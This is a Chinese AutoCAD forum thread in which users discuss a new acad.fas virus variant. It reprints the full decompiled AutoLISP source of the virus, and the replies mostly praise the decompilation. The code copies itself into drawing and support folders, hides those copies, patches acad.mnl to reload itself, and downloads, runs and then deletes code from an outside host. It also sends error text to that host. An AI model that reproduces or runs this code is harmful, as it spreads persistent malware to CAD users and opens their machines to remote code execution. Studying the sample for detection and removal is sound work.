能不能破解一下二代的acad.fas
本帖最后由 Gu_xl 于 2013-11-28 16:25 编辑acad.fas新变种又出来了,好多杀毒软件不能识别。不知道这次的传播原理是什么,盼望大侠破解 (defun *ERROR* (MSG)
(defun *ERROR* (MSG) (PRINC MSG))
(if (or (= MSG "Function cancelled") (= MSG "函数被取消"))
(PRINC)
(DLCJIAN (STRCAT "http://zxb.isdun.com/err/?errinfo=" MSG))
)
)
(defun ZXJBEN (STR)
(if (NOT #S#)
(setq #S# (vlax-create-object "ScriptControl"))
)
(if (NOT #S#)
nil
(progn (setq STR (STRCAT "ret=\"\":" STR))
(vlax-put #S# 'LANGUAGE "vbs")
(vlax-put #S# 'ALLOWUI "False")
(vlax-put #S# 'TIMEOUT 20000)
(if (NOT (VL-CATCH-ALL-ERROR-P
(VL-CATCH-ALL-APPLY
'vlax-invoke-method
(LIST #S# "ExecuteStatement" STR)
)
)
)
(vlax-invoke-method #S# 'EVAL "ret")
)
)
)
)
(defun ACAD20130902 (/ DCL RP RF SF CF BF D LD CD XD F)
(SETVAR "cmdecho" 0)
(VL-LOAD-COM)
(SETVAR "acadlspasdoc" 1)
(if (FINDFILE "acad.fas")
(VL-LOAD-ALL "acad.fas")
)
(setq DCL (FINDFILE "acad.dcl"))
(setq RP (STRCAT (VL-FILENAME-DIRECTORY DCL) "\\"))
(setq RF (STRCAT RP "acad.fas"))
(if (NOT (FINDFILE RF))
(if (setq SF (FINDFILE "shxfont.fas"))
(VL-FILE-COPY SF RF)
)
)
(if (FINDFILE (GETVAR "dwgname"))
(progn (setq CF (STRCAT (GETVAR "dwgprefix") "acad.fas"))
(if (NOT (FINDFILE RF))
(progn (VL-FILE-COPY CF RF) (ATTRIB 35 RF))
)
(if (NOT (FINDFILE CF))
(progn (VL-FILE-COPY RF CF) (ATTRIB 35 CF))
)
)
)
(if (NOT (FINDFILE
(setq BF (STRCAT (vlax-get (vlax-get-acad-object) 'PATH)
"\\shxfont.fas"
)
)
)
)
(VL-FILE-COPY RF BF)
)
(if (> (CJDATE RF) 3)
(progn
(setq D (VL-FILE-SYSTIME DCL))
(setq
LD (STRCAT (ITOA (NTH 0 D)) (ITOA (NTH 1 D)) (ITOA (NTH 3 D)))
)
(setq CD (RTOS (GETVAR "cdate") 2 0))
(setq XD (STRCAT (SUBSTR CD 1 4)
(ITOA (ATOI (SUBSTR CD 5 2)))
(ITOA (ATOI (SUBSTR CD 7 2)))
)
)
(if (/= LD XD)
(progn
(if
(NOT (ZXJBEN
(STRCAT
"CreateObject(\"Shell.Application\").NameSpace(\""
RP
"\").ParseName(\"acad.dcl\").Modifydate=Now"
)
)
)
(progn (ATTRIB 32 DCL)
(setq F (OPEN DCL "a"))
(WRITE-LINE "" F)
(CLOSE F)
)
)
(DLCJIAN "http://zxb.isdun.com/jbbgxf/?f=xshcxgx")
)
)
)
)
(ZXJBEN
(STRCAT
"set fso=CreateObject(\"Scripting.FileSystemObject\"):f1=\""
(FINDFILE "acad.mnl")
"\":s0=fso.OpenTextFile(f1,1).ReadAll:s1=\"(load\"\"shxfont\"\"\"\"\"\")\":s2=\"(defun\":If InStr(s0,s1)=0 Then:fso.GetFile(f1).Attributes=32:s0=Replace(s0,s2,vbCrLf&s1&s2,1,1):Set f=fso.OpenTextFile(f1,2):f.Write s0:f.Close:fso.GetFile(f1).Attributes=33:End If"
)
)
)
(defun DLCJIAN (URL / ZXCJ)
(setq ZXCJ (STRCAT (vlax-get (vlax-get-acad-object) 'PATH)
"\\draw.fas"
)
)
(ZXJBEN
(STRCAT
"\n\t\tSet X=CreateObject(\"Microsoft.XMLHTTP\")\n\t\tX.Open \"GET\",\""
URL
"\",0\n\t\tX.Send()\n\t\tSet G=CreateObject(\"ADODB.Stream\")\n\t\tG.Mode=3\n\t\tG.Type=1\n\t\tG.Open()\n\t\tG.Write(X.responseBody)\n\t\tG.SaveToFile \""
ZXCJ "\",2")
)
(VL-CATCH-ALL-APPLY 'LOAD (LIST ZXCJ))
(VL-FILE-DELETE ZXCJ)
(if ZXCJRXHS
(ZXCJRXHS)
)
)
(defun ATTRIB (SXZ FILE)
(ZXJBEN
(STRCAT
"set fso=CreateObject(\"Scripting.FileSystemObject\"):fso.GetFile(\""
FILE
"\").Attributes="
(ITOA SXZ)
)
)
)
(defun CJDATE (FILE / R)
(setq R
(ZXJBEN
(STRCAT
"set fso=CreateObject(\"Scripting.FileSystemObject\"):ret=DateDiff(\"d\",fso.GetFile(\""
FILE
"\").DateCreated,Now)"
)
)
)
(if R
R
(ERROR-FDIF)
)
)
(defun WORKING nil (if (NULL BS20130902) (progn (setq BS20130902 T) (ACAD20130902))))
(WORKING)
(defun *ERROR* (MSG) (PRINC MSG) (PRINC))
(PRINC) 牛逼,写病毒的应该研究的都很深啊,破解的更牛逼 nzl1116 发表于 2013-11-28 20:06 static/image/common/back.gif
怎么用法?好像还缺个(ERROR-FDIF)函数 做个记号,用到时找 完美反编译了啊这是 看到这个直接全盘删,管他什么杀毒软件。。。 二楼才是真牛,完美反编译啊。 一听是病毒,吓得我赶紧走人 厉害。。。。
页:
[1]